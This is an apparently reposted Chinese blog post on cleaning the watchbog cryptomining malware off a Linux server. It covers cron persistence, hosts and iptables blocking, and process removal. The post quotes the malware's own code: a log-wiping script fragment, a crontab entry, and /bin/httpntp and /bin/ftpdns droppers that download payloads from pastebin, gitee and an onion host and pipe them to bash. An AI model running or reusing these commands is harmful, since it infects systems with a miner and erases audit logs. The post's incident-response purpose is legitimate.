            if [ ! -f "/tmp/.tmpc" ]; then
                successhigh
            fi
        fi
        sleep 30
        if [ ${pm} -eq 0 ];then
            testhigh
            if [ ${pm} -ne 0 ];then
                successhigh
            fi
        fi
        if [ ${pm} -eq 0 ];then
            downloadlow
            if [ ${pm} -ne 0 ];then
                successlow
            fi
        fi
        if [ ${pm} -eq 0 ];then
            testlow
            if [ ${pm} -ne 0 ];then
                successlow
            fi
        fi
        
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    sed -i '/pastebin/d' /var/log/syslog 
    sed -i '/github/d' /var/log/syslog
    echo 0>/var/spool/mail/root
fi
解密腳本詳情

 3)當我們清除掉定時任務的內容之后,隔了一會,其又被加入了如上一模一樣的內容,所以該病毒程序不是一般的病毒程序。

4)經過后來的了解,我們了解到了該進程watchbog為被植入的挖礦程序,該程序會在cron下面寫入腳本,定期去pastebin.com下載木馬開始挖礦,如果刪除不徹底仍然會不定期啟動這個挖礦程序,對我們的系統造成危害,影響的系統中再跑的其他業務。

5)在進行清理watchbog這個挖礦進程的過程中,我一開始雖然限制住了該watchog進程,因為能力有限,沒有徹底清除掉,就是因為沒有徹底清除掉該watchbog進程,其造成了我系統中再跑的rabbitmq服務每天都會宕機,一開始博主本人還一直在研究rabbitmq的報錯日志,浪費了很多時間,后來通過rabbitmq宕機的時間規律,結合系統定時任務發現,是遺留的watchbog進程影響到了rabbitmq的正常運行。

第2章 解決方案

2.1 修改/etc/hosts

通過觀察定時任務內容,我們可以發現幾個惡意網址,分別如下:

1)          ptpb.pw

2)          pastebin.com 

3)          gitee.com 

4)          aziplcr72qjhzvin.onion.to

我們可以先將上述這些地址重定向到本地

[root@localhost ~]# cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.0.1   ptpb.pw pastebin.com  gitee.com  aziplcr72qjhzvin.onion.to

2.2 防火牆控制出入流量

我們將上述被攻擊者攜帶的域名所對應的的ip地址進行ip限制。

比如pastebin.com對應的ip為104.20.208.21

iptables -A INPUT -s 104.20.209.21 -j DROP
iptables -A OUTPUT -s 104.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 104.20.209.2

保存修改內容

/sbin/service iptables save

至於其他域名為了安全起見,也將其對應的ip全部按照上述方法進行限制,另外我們通過strace追蹤watchbog進程,在日志中也發現了幾個可疑的ip,建議將其一並封禁。

[root@localhost ~]# strace -p 3738 ##strace追蹤watchbog主進程
strace: Process 3738 attached
略
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress)
略
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress)
略
connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("178.128.242.134")}, 16) = -1 EINPROGRESS (Operation now in progress)

2.3 移除curl get腳本

因為該挖礦程序會借助curl、wget命令去下載病毒,所以第一時間我們需要進行如下操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

 

 如果確認病毒徹底被刪除,我們可以不需要操作。

2.4 刪掉cron里面的相關任務

crontab -l
/etc/cron.d     
/etc/cron.deny    
/etc/cron.monthly  
/etc/cron.daily  
/etc/cron.hourly  
/etc/crontab       
/etc/cron.weekly

上述8個與cron相關的文件目錄我們都需要仔細檢查一遍,凡是有關curl pastebin.com等信息都要徹底刪除。

不查不知道,一查嚇一跳。

1) crontab -l

首先系統定時任務中我們就發現了。

*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvw
xG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsS
L https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash

2)/etc/cron.d    

該目錄下新增了好幾個命令:appache、root、system

詳情如下:

3)/etc/cron.deny  

沒有發現

4)/etc/cron.monthly  

5)/etc/cron.daily

 

6)/etc/cron.hourly

 7)/etc/crontab

我們在crontab文件中還發現了新的潛藏命令httpntp、ftpdns

8)/etc/cron.weekly

沒有發現

最后我們在用grep過濾一遍,確保完全清除干凈。

2.5 刪除惡意命令

同時我們還發現了惡意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

博主本人是從定時任務中發現這個惡意命令存在的。

httpntp如下:

[root@localhost ~]# vim /bin/httpntp 
(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvi
n.onion.to/old.txt)|bash
##

ftpdns如下:

[root@localhost ~]# vim /bin/ftpdns 
(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvi
n.onion.to/old.txt)|bash
##

watchbog如下:是一個二進制文件

[root@localhost ~]# vim /usr/bin/watchbog
^?ELF^B^A^A^C^@^@^@^@^@^@^@^@^B^@>^@^A^@^@^@°?G^@^@^@^@^@@^@^@^@^@^@^@^@PM$^@^@^@^@^@^@^@^@^@@^@8^@
^@@^@"^@!^@^F^@^@^@^E^@^@^@@^@^@^@^@^@^@^@@^@@^@^@^@^@^@@^@@^@^@^@^@^@0^B^@^@^@^@^@^@0^B^@^@^@^@^@^@^H^@^@^@^@^@^@^@^C^@^@^@^D^@^@^@p^B^@^@^@^@^@^@p^B@^@^@^@^@^@p^B@^@^@^@^@^@^\^@^@^@^@^@^
@^@^\^@^@^@^@^@^@^@^A^@^@^@^@^@^@^@^A^@^@^@^E^@^@^@^@^@^@^@^@^@^@^@^@^@@^@^@^@^@^@^@^@@^@^@^@^@^@?ì#^@^@^@^@^@?ì#^@^@^@^@^@^@^@ ^@^@^@^@^@^A^@^@^@^F^@^@^@^X?#^@^@^@^@^@^X?<83>^@^@^@^@^@^X?
<83>^@^@^@^@^@?o^@^@^@^@^@^@??^@^@^
略

2.6 刪除tmp目錄下timesyncc.service文件

文件詳情如下:

2.7 殺掉watchbog進程

ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9

第3章 總結

面對挖礦進程我總結如下常規思路,如果遇到挖礦進程。

先后順序如下:

1)查看定時任務,找到挖礦程序在執行的內容。

2)將惡意網址的hosts全部重定向到本地(127.0.0.1)

3)仔細查看審核與定時任務有關的文件和目錄,進行清除

4)刪除惡意的命令與包,重命名系統中被利用的命令

5)殺掉對應惡意進程(為什么放到最后呢?因為就算最早殺掉,其還是會因為定時任務等等自動啟動)

 

補充:以上思路是常規思路,

也可以直接關閉crontab定時任務,然后進行上述思路一步步排查,在檢查無誤后,再啟動


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 挖礦病毒watchbog處理過程 記服務器中招挖礦病毒排查過程(解決方案篇) 記一次Xmrig挖礦木馬排查過程 記一次Xmrig挖礦木馬排查過程 挖礦病毒排查 挖礦病毒排查 Connection refused 排查過程 線上問題的排查過程 logrotate沒有rotate的排查過程 一次故障排查過程
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM